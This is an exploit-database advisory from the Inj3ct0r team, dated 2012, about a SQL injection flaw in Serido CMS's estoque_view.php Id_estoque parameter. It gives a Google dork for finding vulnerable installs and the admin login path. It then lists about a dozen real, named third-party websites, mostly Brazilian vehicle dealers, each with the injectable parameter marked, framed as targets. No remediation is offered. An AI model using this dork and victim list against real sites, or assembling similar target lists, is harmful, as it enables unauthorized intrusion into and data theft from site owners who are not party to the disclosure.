Serido CMS SQL Injection

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0      _                   __           __       __                      1 
1    /' \            __  /'__`\        /\ \__  /'__`                    0 
0   /_,     ___   /_/_      ___  ,_/ /   _ ___            1 
1   /_/  /' _ `\ \/\ \/_/_\_<_  /'___  /    /`'__\           0 
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1 
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0 
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1 
1                   \ \____/ >> Exploit database separated by exploit    0 
0                    \/___/          type (local, remote, DoS, etc.)     1 
1                                                                        1 
0   [x] Official Website: http://www.1337day.com                         0 
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1 
0                                                                        0 
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1 
0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1 
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 

========================================================================== 
<<<:>>>           Serido - SQL Injection Vulnerability             <<<:>>> 
========================================================================== 
                                                           
 - Discovered By: 
 ||| TheCyberNuxbie - Independent Security Research ||| 
 <<< [email protected] >>> CP: +62856-2538-963 
 [ www.thecybernuxbie.com ] $ YM: nux_exploit 

 - Info WebApps: 
 This CMS Develop By Serido: 
 http://serido.net/ 
  
 - Google Dork: 
 inurl:"/estoque_view.php?Id_estoque=" 
  
 - Exploit Concept: 
 http://lokalisasi/WebApps/estoque_view.php?Id_estoque=[SQL Injection] 
  
 - Private Area: 
 http://lokalisasi/WebApps/admin/ <--- LogIn Area...!!! 

 http://akyveiculos.com.br/v2/estoque_view.php?Id_estoque=175' + [SQL Injection] 
 http://classificaronline.com/estoque_view.php?Id_estoque=396' + [SQL Injection] 
 http://feiraodopinheirao.com/estoque_view.php?Id_estoque=19' + [SQL Injection] 
 http://fenexveiculos.com.br/estoque_view.php?Id_estoque=136' + [SQL Injection] 
 http://llmultimarcas.com.br/estoque_view.php?Id_estoque=280' + [SQL Injection] 
 http://repasses.com.br/estoque_view.php?Id_estoque=6196' + [SQL Injection] 
 http://seminovositabira.com.br/estoque_view.php?Id_estoque=638' + [SQL Injection] 
 http://ubamotors.com.br/estoque_view.php?Id_estoque=411' + [SQL Injection] 
 http://veic.com.br/estoque_view.php?Id_estoque=499' + [SQL Injection] 
 http://veiculosbrasil.com/estoque_view.php?Id_estoque=707' + [SQL Injection] 
 http://verokatti.com/demo/veiculos3/nv/estoque_view.php?Id_estoque=5' + [SQL Injection] 
 http://vilinhaveiculos.com.br/estoque_view.php?Id_estoque=494' + [SQL Injection] 
 http://webagra.com.br/site/estoque_view.php?Id_estoque=402' + [SQL Injection] 
 , And Many More @ Google...!!! 

 -:>>> Special Thanks <<<:- 
 ...:::' 1337day Inj3ct0r TEAM ':::... 
 [ All Staff & 31337 Member Inj3ct0r TEAM ] 
 BoSs "r0073r" - Owner :) 
 Sid3^effects - Curator Exploit DataBase 
 r4dc0re - Inj3ct0r Forum Administrator 
 CrosS - IRC Administrator 
 SeeMe - Exploit Coding 
 indoushka - Bug Research 
 KnocKout - Bug Research / Social Engineer 
 ZoRLu - Shellcode Coding / Exploit Coding / Bug Research 
 anT!-Tr0J4n - Exploit Coding / Bug Research 
 KedAns-Dz - Bug Research 
 Kalashinkov3 - Bug Research 
 Angel Injection - Bug Research 
 NuxbieCyber - Bug Research 
 , And All Inj3ct0r Fans & All Hacktivist,,, :-) 
  
 ######################################################################### 
 - Me @ Solo Raya, 27 March 2012 @ 11:18 PM. 
 [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] 
 #########################################################################